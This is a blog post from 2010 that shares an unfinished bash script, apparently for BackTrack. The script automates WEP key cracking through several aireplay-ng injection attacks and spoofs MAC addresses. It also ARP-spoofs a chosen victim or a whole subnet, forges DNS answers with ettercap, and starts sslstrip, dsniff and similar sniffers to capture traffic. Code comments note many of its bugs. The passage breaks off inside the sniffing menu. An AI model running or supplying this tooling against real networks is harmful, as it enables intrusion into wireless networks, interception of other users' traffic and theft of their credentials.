Tuesday, November 9, 2010

...:::sLiPpErY's H4X0R tOoL:::...






This is a work in Progress....


NEED A HINT.... http://vimeo.com/13245482 Just the beginning...

Last Update 11-9-10 Check back for updates...

Currently you can..

1. Create a Rogue AP and either sniff or attack it. NEW: after you crack WEP you can mirror the WEP-encrypted AP — endless possibilities, but not tested; only theory at this point.

2. Sniff or Attack your local subnet

3. Crack WEP (there are a lot of WEP attacks but I don't believe I have them all complete, so feel free to help with them, I have the basic layout done though) :)

4. Update some of the tools used in this script.


I notice the code formatting is somewhat mangled on this page. Not sure what to do about that; if you know, please comment :)

Comment on what you would like to see added to this, or any bugs you find.

If you need a tutorial on how to use this, please ask and I shall create!

TODO: a lot... haha...


#!/bin/bash
# Top of the script: clears the screen and prints the banner. Everything
# below is a set of functions; the code that dispatches into them
# (wepcrack / subnetscript / rogueapscript) is not within this excerpt.
# NOTE: nothing checks for root, yet the functions run ifconfig, airmon-ng,
# iptables, macchanger and write under /proc and /etc; without root those
# commands fail one by one and, with no `set -e`, the script keeps going.
clear
echo "******************************************************************";
echo "*            WeLcOmE tO sLiPpErY's H4X0R tOoL rEv 0.1            *";
echo "*  TeStEd WiTh BackTrack 4 R1 aNd rOgUe Ap TeStEd WiTh rt73usb!  *";
echo "*            FeEl FrEe To EdIt ThIs FiLe As ToU wIsH!            *";
echo "* SeNd QuEsTiOnS, cOmMeNtS oR aDdItIoNs To slippery@shellium.org *";
echo "******************************************************************";
echo

# WEP Crack setup
function wepcrack(){
# Interactive setup for the WEP section: checks tooling, puts the chosen
# wireless interface into monitor mode, opens an airodump-ng window so the
# user can pick a network, changes the monitor interface's MAC, runs an
# injection test and hands off to wepattackmenu.
# Globals written: WIFACE, MIFACE, ESSID, CHAN, BSSID, CLIENTMAC, MAC
# (read by the helper functions below).
# NOTE: every `read` here is without -r and without any validation; the
# values are passed straight to ifconfig/airmon-ng/aireplay-ng.
clear;
echo "******************************************************************";
echo "*********************Time to H4X0R some WEP!!*********************";
echo "******************************************************************";
echo "Checking if the correct programs are installed..........";
# NOTE: the messages say "Abort" but nothing exits or returns — a missing
# tool only prints a line and the function carries on without it.
type -P aircrack-ng &>/dev/null || { echo "I require aircrack-ng but it's not installed.  Abort.";}
type -P xterm &>/dev/null || { echo "I require xterm but it's not installed.  Abort.";}
type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";}
echo "******************************************************************";
echo "Killing old processes if they exist";
airmon-ng stop mon0 &>/dev/null; # Just incase you were already using monitor mode
airmon-ng stop mon1 &>/dev/null; # If you happen to of had a 4th interface or
airmon-ng stop mon2 &>/dev/null; # if your interface isn't mon0-3 please edit
airmon-ng stop mon3 &>/dev/null; # this to what you have, ONLY EDIT HERE!!
# NOTE: killall matches by process name system-wide, so this also closes
# every xterm the user has open, not just the ones started by this script.
killall -q aircrack-ng airodump-ng aireplay-ng xterm &>/dev/null; # Should kill all programs that may interfere with this script
echo "******************************************************************";
echo "Enter the interface used to H4X0R with (Ex. wlan0, wlan1)";
read WIFACE;
echo "Using "$WIFACE" to H4X0R with";
ifconfig "$WIFACE" up;
echo "******************************************************************";
airmon-ng start "$WIFACE" &>/dev/null;
# NOTE: if more than one line of `ifconfig` contains UNSPEC, MIFACE ends up
# holding several names separated by newlines and every later command that
# uses it gets a bad argument; the original comment below describes the
# manual workaround.
MIFACE=`ifconfig | grep UNSPEC | awk '{ print $1}' | cut -c 1-4`; # Finds your monitor interface from the selected interface - Note: If you see mutiple monitor interfaces then you need to edit above where it talks about killing monitor interfaces and insert the monitor interface you use.
echo "Using "$MIFACE" as your monitor interface";
echo "******************************************************************";
xterm -hold -bg black -fg blue -T "Scanning networks" -geometry 90x20 -e airodump-ng "$MIFACE" -t wep &>/dev/null & # Scans for local WiFi networks
echo "You should see a new window with local WEP networks";
echo "******************************************************************";
echo "Enter the name of an AP to H4X0R";
read ESSID;
echo "******************************************************************";
echo "Enter the channel "$ESSID" is using";
read CHAN;
echo "******************************************************************";
echo "Enter the MAC of "$ESSID"";
read BSSID;
echo "******************************************************************";
echo "If there is a client connected to "$ESSID" please type their MAC or just press enter";
read CLIENTMAC;
echo "******************************************************************";
echo ""$ESSID"'s MAC is "$BSSID" and is using channel "$CHAN"";
echo "******************************************************************";
echo "Enter the MAC you want to use for "$MIFACE" (Ex: 0A:1B:2C:3D:4E:5F)";
read MAC;
echo "******************************************************************";
echo "Restarting "$WIFACE" and changing the MAC address to "$MAC" on "$MIFACE"";
echo
# Tear monitor mode down and bring it back up locked to CHAN, then change
# the MAC while the monitor interface is down. None of this is undone
# later; the interface is left in monitor mode with the spoofed MAC.
airmon-ng stop "$MIFACE" &>/dev/null;
airmon-ng stop "$WIFACE" &>/dev/null;
ifconfig "$WIFACE" down;
ifconfig "$WIFACE" up;
airmon-ng start "$WIFACE" "$CHAN" &>/dev/null;
ifconfig "$MIFACE" down;
sleep 2;
macchanger -m "$MAC" "$MIFACE";
sleep 1;
ifconfig "$MIFACE" up;
# Purpose of loading the tun module is not evident from this function
# (nothing below uses a tun device) — TODO confirm whether it is needed.
modprobe tun;
sleep 1;
killall -q airodump-ng xterm &>/dev/null;
sleep 1;
echo "******************************************************************";
echo "Testing "$MIFACE" for injection";
xterm -hold -bg black -fg blue -T "Injection Test" -geometry 90x20 -e aireplay-ng -9 -e "$ESSID" -b "$BSSID" "$MIFACE" &>/dev/null &
sleep 5;
# The test window is closed after a fixed 5 s regardless of its result.
killall -q aireplay-ng xterm &>/dev/null;
sleep 2;
clear;
wepattackmenu;
}

#Captures IV's and saves them to h4x0r.cap
function capture(){
# Starts an airodump-ng capture of BSSID on CHAN in a background xterm,
# writing h4x0r.cap-* files into the current working directory.
# Globals read: ESSID, CHAN, BSSID, MIFACE.
echo "******************************************************************";
# NOTE: deletes earlier captures from whatever the cwd happens to be —
# unquoted glob, no `--`, and rm prints an error if nothing matches.
rm h4x0r.cap-*;
sleep 2;
echo "Starting to capture IV's from "$ESSID"";
# NOTE: $CHAN is the only expansion left unquoted in this file; an empty
# value silently drops the -c argument instead of failing.
xterm -hold -bg black -fg blue -T "Capturing IV's" -geometry 90x20 -e airodump-ng -c $CHAN --bssid "$BSSID" -w h4x0r.cap "$MIFACE" &>/dev/null &
sleep 5;
}

function associate(){
# Runs an aireplay-ng -1 association attempt against BSSID as the spoofed
# MAC, in a background xterm that stays open (-hold).
# Globals read: ESSID, BSSID, MAC, MIFACE.
# The result is not checked; the caller simply waits 5 s and moves on.
echo "******************************************************************";
echo "Trying to associate with "$ESSID"";
xterm -hold -bg black -fg blue -T "Associating" -geometry 90x20 -e aireplay-ng -1 0 -e "$ESSID" -a "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null &
#For Picky AP's uncomment below and comment the above...
#xterm -hold -bg black -fg blue -T "Associating" -geometry 90x20 -e aireplay-ng -1 30 -q 10 -o 1 -e "$ESSID" -a "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function injectarpclientless(){
# ARP request replay (aireplay-ng -3) using the spoofed MAC, in a background
# xterm. Globals read: ESSID, BSSID, MAC, MIFACE.
echo "******************************************************************";
echo "Injecting ARP packets into "$ESSID"";
xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -3 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function injectarpclient(){
# Same as injectarpclientless but with CLIENTMAC as the source address.
# Globals read: ESSID, BSSID, CLIENTMAC, MIFACE.
# NOTE: CLIENTMAC may be empty (wepcrack lets the user just press enter);
# nothing here checks for that before building the command line.
echo "******************************************************************";
echo "Injecting Client ARP packets into "$ESSID"";
#xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -d FF:FF:FF:FF:FF:FF -m 68 -n 86 -t 1 -f 1 "$MIFACE" &>/dev/null &
xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -3 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function randomarpclientless(){
# Launches two aireplay-ng -2 instances at once with the spoofed MAC.
# Globals read: ESSID, BSSID, MAC, MIFACE.
# NOTE: `replay*.cap` is an unquoted glob from the cwd; with several
# matches the extra names become stray arguments, with none the literal
# pattern is passed. Not called from wepattackmenu in this excerpt.
echo "******************************************************************";
echo "Injecting a random ARP packet into "$ESSID"";
xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b "$BSSID" -h "$MAC" -r replay*.cap "$MIFACE" &>/dev/null &
xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -m 68 -n 86 -b "$BSSID" -c FF:FF:FF:FF:FF:FF -h "$MAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function randomarpclient(){
# Same as randomarpclientless but with CLIENTMAC as the source address.
# Globals read: ESSID, BSSID, CLIENTMAC, MIFACE.
# Same unquoted `replay*.cap` glob caveat applies; not called from
# wepattackmenu in this excerpt.
echo "******************************************************************";
echo "Injecting a random ARP packet into "$ESSID"";
xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b "$BSSID" -h "$CLIENTMAC" -r replay*.cap "$MIFACE" &>/dev/null &
xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -m 68 -n 86 -b "$BSSID" -c FF:FF:FF:FF:FF:FF -h "$CLIENTMAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function fragclientless(){
# Fragmentation attack (aireplay-ng -5) as the spoofed MAC, in a background
# xterm. Globals read: ESSID, BSSID, MAC, MIFACE.
# The caller relies on a fragment*.xor file appearing in the cwd afterwards
# (see xorfragclientless); nothing here waits for or verifies that.
echo "******************************************************************";
echo "Starting fragmenation attack against "$ESSID"";
xterm -hold -bg black -fg blue -T "Fragmenation Attack" -geometry 90x20 -e aireplay-ng -5 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function fragclient(){
# Same as fragclientless but with CLIENTMAC as the source address.
# Globals read: ESSID, BSSID, CLIENTMAC, MIFACE.
echo "******************************************************************";
echo "Starting fragmenation attack against "$ESSID"";
xterm -hold -bg black -fg blue -T "Fragmenation Attack" -geometry 90x20 -e aireplay-ng -5 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function chopchopclientless(){
# Chop-chop attack (aireplay-ng -4) as the spoofed MAC, in a background
# xterm. Globals read: ESSID, BSSID, MAC, MIFACE.
# The caller expects a replay*.xor file in the cwd afterwards (see
# xorchopchopclientless); nothing here waits for or verifies that.
echo "******************************************************************";
echo "Starting chop chop attack against "$ESSID"";
xterm -hold -bg black -fg blue -T "Chop Chop Attack" -geometry 90x20 -e aireplay-ng -4 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function chopchopclient(){
# Same as chopchopclientless but with CLIENTMAC as the source address.
# Globals read: ESSID, BSSID, CLIENTMAC, MIFACE.
echo "******************************************************************";
echo "Starting chop chop attack against "$ESSID"";
xterm -hold -bg black -fg blue -T "Chop Chop Attack" -geometry 90x20 -e aireplay-ng -4 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null &
sleep 5;
}


function injectcapturedarpcleintless(){
# Replays the packet file h4x0r-arp (written by the xor* helpers into the
# cwd) with aireplay-ng -2 as the spoofed MAC, in a background xterm.
# Globals read: BSSID, MAC, MIFACE.
# NOTE: "cleint" is a typo in the name, but wepattackmenu calls it under
# this spelling — renaming would have to be done in both places.
echo "******************************************************************";
echo "Injecting the created ARP packet";
xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -h "$MAC" -r h4x0r-arp "$MIFACE" &>/dev/null &
sleep 5;
}

function injectcapturedarpcleint(){
# Same as injectcapturedarpcleintless but with CLIENTMAC as the source
# address. Globals read: BSSID, CLIENTMAC, MIFACE.
# Same "cleint" typo caveat: wepattackmenu calls it under this spelling.
echo "******************************************************************";
echo "Injecting the created ARP packet";
xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -h "$CLIENTMAC" -r h4x0r-arp "$MIFACE" &>/dev/null &
sleep 5;
}

function xorfragclientless(){
# Builds h4x0r-arp in the cwd with packetforge-ng from a fragment*.xor file
# (expected to have been produced by fragclientless). Runs in the
# foreground, so the sleep afterwards is not waiting on anything.
# Globals read: BSSID, MAC.
# NOTE: `fragment*.xor` is an unquoted glob; several matches become extra
# arguments, no match passes the literal pattern. Exit status is ignored.
packetforge-ng -0 -a "$BSSID" -h "$MAC" -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w h4x0r-arp
sleep 5;
}

function xorfragclient(){
# Same as xorfragclientless but with CLIENTMAC as the source address.
# Globals read: BSSID, CLIENTMAC. Same glob and exit-status caveats.
packetforge-ng -0 -a "$BSSID" -h "$CLIENTMAC" -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w h4x0r-arp
sleep 5;
}

function xorchopchopclientless(){
# Builds h4x0r-arp in the cwd with packetforge-ng from a replay*.xor file
# (expected from chopchopclientless). Foreground command; exit status is
# ignored and the sleep is not waiting on anything.
# Globals read: BSSID, MAC.
# NOTE: `replay*.xor` is an unquoted glob with the usual multi/no-match
# problems.
packetforge-ng -0 -a "$BSSID" -h "$MAC" -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w h4x0r-arp
sleep 5;
}

function xorchopchopclient(){
# Same as xorchopchopclientless but with CLIENTMAC as the source address.
# Globals read: BSSID, CLIENTMAC. Same glob and exit-status caveats.
packetforge-ng -0 -a "$BSSID" -h "$CLIENTMAC" -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w h4x0r-arp
sleep 5;
}

#Cracks the key....
function crackkey(){
# Waits for the user, starts aircrack-ng on the h4x0r*.cap files in the cwd
# in a background xterm, then exits the whole script.
# Globals read: BSSID.
# NOTE: `exit 0` here ends the script while every xterm started by the
# helpers keeps running (-hold), and nothing restores the interface: it
# stays in monitor mode with the changed MAC. There is no cleanup path in
# the WEP section at all.
echo "******************************************************************";
read -p "Hit Enter when you have 10,000 IV's, could take up to 5 min.";
echo "******************************************************************";
echo "Starting to H4X0R the WEP key..................";
xterm -hold -bg black -fg blue -T "Cracking" -e aircrack-ng -b "$BSSID" h4x0r*.cap &>/dev/null &
sleep 1;
echo "******************************************************************";
echo "You should see the WEP key soon......";
echo "******************************************************************";
exit 0
}

#Defines the type of attack to crack WEP
function wepattackmenu(){
# Menu that chains the capture/associate/inject/crack helpers. Defines a
# nested showMenu (global once this runs; attacksn and sniffsn redefine the
# same name) and loops forever on `read`. Globals written: CHOICE.
# NOTE: the printed labels and the case arms disagree — the list shows "3)"
# twice and only goes to 5, while the arms below handle 1–6 in a different
# order. There is no `*)` arm, so any other input just reprints the menu.
# The file-deletion warning refers to the `rm` in capture().
clear;
echo "******************************************************************";
echo "**************Please select the type of attack below**************";
echo "THIS WILL DELETE ANY PREVIOUS h4x0r.cap* FILE RENAME IT TO KEEP IT";
echo "******************************************************************";
showMenu () {
 echo
 echo "1) ARP request replay attack (clientless)"
 echo "2) NOT TESTED Fragmentation (clientless)"
 echo "3) NOT TESTED Chop Chop (clientless)"
 echo "3) NOT TESTED ARP request replay attack (client)"
 echo "4) NOT TESTED Fragmentation (Client)"
 echo "5) NOT TESTED Chop Chop (client)"
}
while [ 1 ]
do
 showMenu
 read CHOICE
 case "$CHOICE" in
 "1")
  echo "ARP request replay attack (clientless)";
  capture;
  associate;
  injectarpclientless;
  crackkey;
  ;;
 "2")
  echo "Fragmentation (clientless)";
  capture;
  associate;
  fragclientless;
  xorfragclientless;
  injectcapturedarpcleintless;
  crackkey;
  ;;
 "3")
  echo "Chop Chop (clientless)"
  capture;
  associate;
  chopchopclientless;
  xorchopchopclientless;
  injectcapturedarpcleintless;
  crackkey;
  ;;
 "4")
  echo "ARP request replay attack (client)";
  capture;
  associate;
  injectarpclientless;
  injectarpclient;
  crackkey; 
  ;;
 "5")
  echo "Fragmentation (Client)";
  capture;
  fragclient;
  xorfragclient;
  injectcapturedarpcleint;
  crackkey;
  ;;
 "6")
  echo "Chop Chop (client)";
  capture;
  chopchopclient;
  xorchopchopclient;
  injectcapturedarpcleintless;
  crackkey;
  ;;
 esac
done
}

# Script to gain information about your subnet and H4X0R it!
function subnetscript(){
# Interactive setup for the local-subnet section: checks tooling, resets the
# host firewall, enables IPv4 forwarding, derives interface/IP/gateway/subnet
# from `ip route`, optionally changes the MAC, then calls arpsetup and
# qsubnet.
# Globals written: IFACE, IFACEIP, GW, SUBNET, MAC (read by arpsetup,
# dnsspoof, sniffsn, attacksn, qsubnet).
# NOTE: every `read` is without -r and unvalidated.
clear;
echo "******************************************************************";
echo "Checking if the correct programs are installed..........";
# NOTE: as in wepcrack, "Abort" only prints — nothing exits. The `locate`
# checks depend on an up-to-date locate database, not on the tools
# actually being present. netdiscover (used by arpsetup) is not checked.
type -P xterm &>/dev/null || { echo "I require xterm but it's not installed.  Abort.";}
type -P iptables &>/dev/null || { echo "I require iptables but it's not installed.  Abort.";}
type -P ettercap &>/dev/null || { echo "I require ettercap but it's not installed.";}
type -P arpspoof &>/dev/null || { echo "I require arpspoof but it's not installed.";}
type -P sslstrip &>/dev/null || { echo "I require sslstrip for a sniffing tool but it's not installed.";}
type -P driftnet &>/dev/null || { echo "I require driftnet for a sniffing tool but it's not installed.";}
type -P urlsnarf &>/dev/null || { echo "I require urlsnarf for a sniffing tool but it's not installed.";}
type -P dsniff &>/dev/null || { echo "I require dsniff for a sniffing tool but it's not installed.";}
type -P python &>/dev/null || { echo "I require python for certain tools but it's not installed.";}
type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";}
type -P msfconsole &>/dev/null || { echo "I require metasploit for an attack tool but it's not installed.";}
locate set_config &>/dev/null || { echo "I require Social Engineering Toolkit for an attack tool but it's not installed.";}
locate fast-track.py &>/dev/null || { echo "I require fast-track.py for an attack tool but it's not installed.";}
locate SimpleHTTPServer &>/dev/null || { echo "I require SimpleHTTPServer for an attack tool but it's not installed.";}
echo "******************************************************************";
echo "Activating IP Forwarding and killing old H4X0R processes if they exist";
echo "******************************************************************";
echo "Note: I'm not killing certian tools as you may have them open and waiting before you run this script";
# NOTE: this killall is backgrounded, so the iptables/ifconfig commands
# below may run before the old processes are actually gone. It also kills
# every xterm and every `tail` on the system by name.
killall -q ettercap arpspoof sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null & # Should kill all programs that may interfere with this script
# NOTE: the four lines below wipe the host's entire iptables configuration
# (filter and nat tables, user chains included); the previous ruleset is
# not saved and is never restored by anything in this file.
iptables --flush; # Makes sure your iptables are clear
iptables --table nat --flush; # Makes sure your iptables are clear
iptables --delete-chain; # Makes sure your iptables are clear
iptables --table nat --delete-chain; # Makes sure your iptables are clear
# NOTE: system-wide setting, left enabled after the script exits.
echo 1 > /proc/sys/net/ipv4/ip_forward; # Sets IP forwarding
echo "******************************************************************";
# The four `ip route` parses below assume the first printed route is the
# link-scope one ("<subnet> dev <iface> ... src <ip>") and that exactly one
# route carries `via`. On a host where `default via ...` prints first, $3
# of line 1 is the gateway address, not an interface — verify on the target
# system. Multiple `src`/`via` routes give multi-line values.
IFACE=`ip route  | awk '{print $3}' | sed q`; # Finds your interface
echo "Using "$IFACE" as your internet connected interface";
echo "******************************************************************";
IFACEIP=`ip route | grep src | awk '{print $9}'`; # Finds your IP
echo "Using "$IFACEIP" as your IP address for "$IFACE"";
echo "******************************************************************";
GW=`ip route | grep via | awk '{print $3}'`; # Finds your Gateway IP
echo "Using "$GW" for the Gateway address for "$IFACE"";
echo "******************************************************************";
SUBNET=`ip route | awk '{print $1}' | sed q` # Finds your subnet
echo "Using "$SUBNET" as as the subet to H4X0R";
echo "******************************************************************";
echo "Enter a MAC address to use, Ex: 0A:1B:2C:3D:4E:5F or hit enter to leave your MAC alone";
read MAC;
echo "using "$MAC" for your MAC address";
echo "******************************************************************";
echo "Restarting and changing the MAC address to "$MAC" on "$IFACE"";
# NOTE: the "hit enter to leave your MAC alone" option is not honoured —
# macchanger is invoked unconditionally, with an empty -m value in that case.
ifconfig "$IFACE" down;
sleep 2;
macchanger -m "$MAC" "$IFACE";
ifconfig "$IFACE" up;
# Purpose of loading tun here is not evident from this function — TODO confirm.
modprobe tun;
echo "******************************************************************";
arpsetup;
qsubnet;
}

# Arpspoof Setup for subnet
function arpsetup(){
# Asks whether to arpspoof the whole subnet or one host, starts arpspoof in
# the background accordingly, then adds the port-80 → 8080 REDIRECT rule
# that sniffsn's sslstrip option listens on.
# Globals read: SUBNET, IFACE, GW. Globals written: SNIFFING, CLIENT
# (CLIENT is only set on the "one" path; dnsspoof/sniffsn/webspy use it).
# NOTE: the arpspoof processes are backgrounded with no PID recorded, so the
# only way anything in this file stops them is the name-based killall in
# subnetscript on the next run; the nat rule likewise persists after exit.
clear;
echo "******************************************************************";
echo "Do you want to arpspoof one client or all clients on the subnet of "$SUBNET"? (one or all) Note: webspy only works with one client!";
read SNIFFING;
echo "******************************************************************";
if [ "$SNIFFING" == "all" ];then
  arpspoof -i "$IFACE" "$GW" &>/dev/null &
elif [ "$SNIFFING" == "one" ];then
  xterm -hold -bg black -fg blue -T "netdiscover" -e netdiscover -i "$IFACE" -r "$SUBNET" &>/dev/null &
  echo "******************************************************************";
  echo "Enter the victim's IP from the 'netdiscover' window";
  read CLIENT;
  echo "arpspoofing "$CLIENT" only";
  echo "******************************************************************";
  arpspoof -i "$IFACE" -t "$GW" "$CLIENT" &>/dev/null &
  arpspoof -i "$IFACE" -t "$CLIENT" "$GW" &>/dev/null &
else 
  echo "******************************************************************";
  echo "Enter 'one' or 'all' only!!!";
  # NOTE: exits with status 0 on bad input, after subnetscript has already
  # flushed iptables, enabled forwarding and changed the MAC.
  exit 0
fi
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080;
}

# DNS Spoof setup for subnet
function dnsspoof(){
# Flushes the nat table, enables ettercap's iptables redirect lines in
# /etc/etter.conf if still commented out, overwrites etter.dns with a single
# A record pointing DNSADDY at this host, and starts ettercap with the
# dns_spoof plugin in a background xterm.
# Globals read: IFACEIP, IFACE, CLIENT, GW. Globals written: DNSADDY.
# NOTE: the flush also removes the port-80 REDIRECT rule arpsetup added.
clear;
iptables --table nat --flush; # clears the way for attacks...
echo "******************************************************************";
echo "You can run this over and over if you need to change DNS spoofing";
echo "******************************************************************";
  # NOTE: in-place edit of a system config file with no backup; the same
  # block is duplicated verbatim in sniffsn. The `cat | grep -q` could just
  # be `grep -q ... /etc/etter.conf`.
  if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then
    sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    echo "Uncommented your iptables in /etc/etter.conf for you :)";
  fi
killall -q ettercap &>/dev/null &
echo "Enter a website you want to dns spoof (Ex. '*.google.com' or '*' for all sites)";
read DNSADDY;
echo "Every time a victim tries to connect to "$DNSADDY" they will be forwarded to "$IFACEIP"";
echo "******************************************************************";
# NOTE: `>` truncates the system-wide etter.dns — any existing entries are
# lost, and the user's input goes in unvalidated.
echo ""$DNSADDY" A "$IFACEIP"" > /usr/share/ettercap/etter.dns
# NOTE: when arpsetup chose "all", CLIENT is unset and the first target spec
# becomes `//` — confirm that is what ettercap should receive. The log file
# lands in the cwd. `sudo` here is redundant if the script already runs
# as root, which the iptables/etc writes above require.
xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i "$IFACE" -P dns_spoof /"$CLIENT"/ /"$GW"/ &>/dev/null &
#sudo ettercap -G &>/dev/null &
sleep 5;
}

# Attack Menu for subnet
function attacksn(){
# Menu for the subnet "attack" path: launches external tools in xterms,
# calls dnsspoof, or exits. Redefines the global showMenu. Globals written:
# CHOICE. Globals read: PWD.
# NOTE: options 2–4 `cd` into hard-coded BackTrack 4 paths under /pentest
# and the `cd` is not undone, so the cwd of the whole script (and of the
# SimpleHTTPServer in option 1, which serves $PWD) changes for the rest of
# the run. Since `cd ... && xterm ... &` backgrounds the whole list, the
# `cd` runs in a subshell only if the list is backgrounded as a unit — in
# bash it is, so the cwd change actually does not persist; verify before
# relying on either reading. `cleanup` (option 7) is not defined in this
# excerpt — confirm it exists elsewhere in the file.
clear;
echo "******************************************************************";
echo "Launch DNS Spoof after your tools are setup!";
echo "******************************************************************";
  showMenu () {
 echo
 echo "1) SimpleHTTPServer port 80"
 echo "2) Social Engineering Toolkit"
 echo "3) Metasploit"
 echo "4) Fast-Track"
 echo "5) Add your own tool"
 echo "6) Launch DNS Spoof"
 echo "7) Exit and cleanup"
 echo "8) Exit and leave everything running"
 echo 
}
while [ 1 ]
do
 showMenu
 read CHOICE
 case "$CHOICE" in
 "1")
   echo "Setting up SimpleHTTPServer on port 80 in "$PWD"";
   xterm -bg black -fg blue -T "SimpleHTTPServer" -e python -m SimpleHTTPServer 80 &>/dev/null &
  ;;
 "2")
   echo "Setting up Social Engineering Toolkit";
   cd /pentest/exploits/SET && xterm -bg black -fg blue -T "Social Engineering Toolkit" -e ./set &>/dev/null &
  ;;
 "3")
   echo "Setting up Metasploit.........";
   cd /pentest/exploits/framework3 && xterm -bg black -fg blue -T "Metasploit" -e ./msfconsole &>/dev/null &
   sleep 2;
   echo "Few more seconds......";
  ;;
 "4")
   echo "Setting up Fast-Track";
   cd /pentest/exploits/fasttrack/ && xterm -bg black -fg blue -T "Fast-Track" -e ./fast-track.py -i &>/dev/null & 
  ;;
 "5")
   echo "******************************************************************";
   echo "What other attacks are you planning? Email me slippery@shellium.org";
  xterm -bg black -fg blue &>/dev/null &
   echo "******************************************************************";
  ;;
 "6")
   dnsspoof;
  ;;

 "7")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   cleanup;
   exit 0
  ;;
 "8")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   # Leaves arpspoof, ettercap, the nat rule and ip_forward in place.
   firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
   exit 0
  ;;
 esac
done
}

# Sniff menu for subnet
function sniffsn(){
# Menu for the subnet "sniff" path: applies the same etter.conf edit as
# dnsspoof, starts ettercap in a background xterm, then offers sslstrip,
# driftnet, urlsnarf, dsniff and webspy launchers. Redefines the global
# showMenu. Globals read: IFACE, CLIENT, GW. Globals written: CHOICE.
# NOTE: option 7 calls `attackmenu`, which is not defined anywhere in this
# excerpt — the subnet attack menu in this file is named attacksn, so this
# is probably a typo; confirm. `cleanup` (option 8) is also not in view.
clear;
echo "******************************************************************";
echo "Checking to see if your ready to run ettercap...";
echo "******************************************************************";
  # NOTE: verbatim copy of the /etc/etter.conf edit in dnsspoof — in-place,
  # no backup; a shared helper would keep the two in step.
  if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then
    sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    echo "Uncommented your iptables in /etc/etter.conf for you :)";
  fi
killall -q ettercap &>/dev/null &
# NOTE: CLIENT is unset when arpsetup chose "all" (target becomes `//`);
# the log file is written to the cwd; `sudo` is redundant when already root.
xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i "$IFACE" /"$CLIENT"/ /"$GW"/ &>/dev/null &
#sudo ettercap -G &>/dev/null &
sleep 7;
clear;
echo "If ettercap is now sniffing then startup some other fun tools";
echo "******************************************************************";
  showMenu () {
 echo
 echo "1) sslstrip"
 echo "2) driftnet"
 echo "3) urlsnarf"
 echo "4) dsniff"
 echo "5) webspy (Only if you slected one client)"
 echo "6) Add your own tool"
 echo "7) Stop sniffing and start attacking"
 echo "8) Exit and cleanup"
 echo "9) Exit and leave everything running"
 echo
}
while [ 1 ]
do
 showMenu
 read CHOICE
 case "$CHOICE" in
 "1")
   echo "Setting up sslstrip";
   # Listens on 8080, the port arpsetup's nat REDIRECT rule points at.
   # sslstrip.log is expected in the cwd; `tail -f` is started before it
   # is guaranteed to exist.
